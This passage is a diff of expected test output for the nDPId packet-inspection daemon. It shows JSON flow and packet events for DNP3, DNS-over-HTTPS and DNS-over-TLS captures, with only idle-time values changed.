00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":514,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097513177295,"flow_last_seen":1097513177297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097513177297,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":135,"flow_first_seen":1097505644006,"flow_last_seen":1097506028601,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097513177295,"flow_last_seen":1097513185107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":93,"flow_first_seen":1097507785883,"flow_last_seen":1097507856257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1419,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1097510947092,"flow_last_seen":1097510959487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1097512255234,"flow_last_seen":1097512267645,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":543,"packets-processed":543,"total-skipped-flows":0,"total-l4-data-len":7788,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":8,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":58,"global_ts_msec":1097513185107}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 543/543

14
test/results/dns_doh.pcap.out
View File

@@ -1,12 +1,12 @@
00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dns_doh.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dns_doh.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1571089200789}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1571089200789,"flow_last_seen":1571089200789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1571089200789,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1571089200789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1571089200789,"pkt":"WkBO7NFkeDHBvV4kCABFAABAAABAAEAGI5asFAoEaBD4+cLVAbuk7FgiAAAAALAC\/\/+OlwAAAgQFtAEDAwYBAQgKHZWyDQAAAAAEAgAA"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1571089200876,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1571089200876,"pkt":"eDHBvV4kWkBO7NFkCABFAAA0AAAAADAGc6JoEPj5rBQKBAG7wtXKYdwupOxYI4ASchB+OgAAAgQFFAEBBAIBAwMK"}
00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1571089200876,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1571089200876,"pkt":"WkBO7NFkeDHBvV4kCABFAAAoAABAAEAGI66sFAoEaBD4+cLVAbuk7FgjymHcL1AQEAAggAAA"}
00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1571089200789,"flow_last_seen":1571089200878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1571089200878,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00953{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1571089200789,"flow_last_seen":1571089200968,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1817,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1571089200968,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":142,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":142,"flow_first_seen":1571089200789,"flow_last_seen":1571089204031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":12658,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1571089204031,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1571089200789,"flow_last_seen":1571089200789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1571089200789,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1571089200789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1571089200789,"pkt":"WkBO7NFkeDHBvV4kCABFAABAAABAAEAGI5asFAoEaBD4+cLVAbuk7FgiAAAAALAC\/\/+OlwAAAgQFtAEDAwYBAQgKHZWyDQAAAAAEAgAA"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1571089200876,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1571089200876,"pkt":"eDHBvV4kWkBO7NFkCABFAAA0AAAAADAGc6JoEPj5rBQKBAG7wtXKYdwupOxYI4ASchB+OgAAAgQFFAEBBAIBAwMK"}
00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1571089200876,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1571089200876,"pkt":"WkBO7NFkeDHBvV4kCABFAAAoAABAAEAGI66sFAoEaBD4+cLVAbuk7FgjymHcL1AQEAAggAAA"}
00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1571089200789,"flow_last_seen":1571089200878,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1571089200878,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00953{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1571089200789,"flow_last_seen":1571089200968,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1817,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1571089200968,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":142,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":142,"flow_first_seen":1571089200789,"flow_last_seen":1571089204031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":12658,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1571089204031,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":142,"source":"dns_doh.pcap","alias":"nDPId-test","packets-captured":142,"packets-processed":142,"total-skipped-flows":0,"total-l4-data-len":12658,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1571089204031}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 142/142

14
test/results/dns_dot.pcap.out
View File

@@ -1,12 +1,12 @@
00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dns_dot.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dns_dot.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1572783663234}
00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1572783663234,"flow_last_seen":1572783663234,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1572783663234,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1572783663234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572783663234,"pkt":"uCfrK5DxCAAnjau+CABFAAA8w6dAAEAGpKPAqAG5CAgICOOyA1VVRPv3AAAAAKAC+vDSnwAAAgQFtAQCCAoqL5UTAAAAAAEDAwc="}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1572783663269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572783663269,"pkt":"CAAnjau+uCfrK5DxCABFAAA8cqUAAHcG\/qUICAgIwKgBuQNV47LuO0vYVUT7+KAS6yDKxQAAAgQFZAQCCAqOOwAQKi+VEwEDAwg="}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1572783663269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1572783663269,"pkt":"uCfrK5DxCAAnjau+CABFAAA0w6hAAEAGpKrAqAG5CAgICOOyA1VVRPv47jtL2YAQAfbSlwAAAQEICiovlTaOOwAQ"}
01181{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1572783663234,"flow_last_seen":1572783663269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1572783663269,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"4fa5e77b91a47e7cdcf5a5e6d25f8449","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01643{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1572783663234,"flow_last_seen":1572783663319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3069,"flow_tot_l4_payload_len":3267,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":1572783663319,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"4fa5e77b91a47e7cdcf5a5e6d25f8449","ja3s":"2b341b88c742e940cfb485ce7d93dde7","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"BE:73:46:2A:2E:FB:A9:E9:42:D0:71:10:1B:8C:BF:44:6A:5D:AD:53"}}
01056{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1572783663234,"flow_last_seen":1572783666246,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3069,"flow_tot_l4_payload_len":4269,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1572783666246,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1572783663234,"flow_last_seen":1572783663234,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1572783663234,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1572783663234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572783663234,"pkt":"uCfrK5DxCAAnjau+CABFAAA8w6dAAEAGpKPAqAG5CAgICOOyA1VVRPv3AAAAAKAC+vDSnwAAAgQFtAQCCAoqL5UTAAAAAAEDAwc="}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1572783663269,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572783663269,"pkt":"CAAnjau+uCfrK5DxCABFAAA8cqUAAHcG\/qUICAgIwKgBuQNV47LuO0vYVUT7+KAS6yDKxQAAAgQFZAQCCAqOOwAQKi+VEwEDAwg="}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1572783663269,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1572783663269,"pkt":"uCfrK5DxCAAnjau+CABFAAA0w6hAAEAGpKrAqAG5CAgICOOyA1VVRPv47jtL2YAQAfbSlwAAAQEICiovlTaOOwAQ"}
01181{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1572783663234,"flow_last_seen":1572783663269,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1572783663269,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"4fa5e77b91a47e7cdcf5a5e6d25f8449","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01643{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1572783663234,"flow_last_seen":1572783663319,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3069,"flow_tot_l4_payload_len":3267,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":1572783663319,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 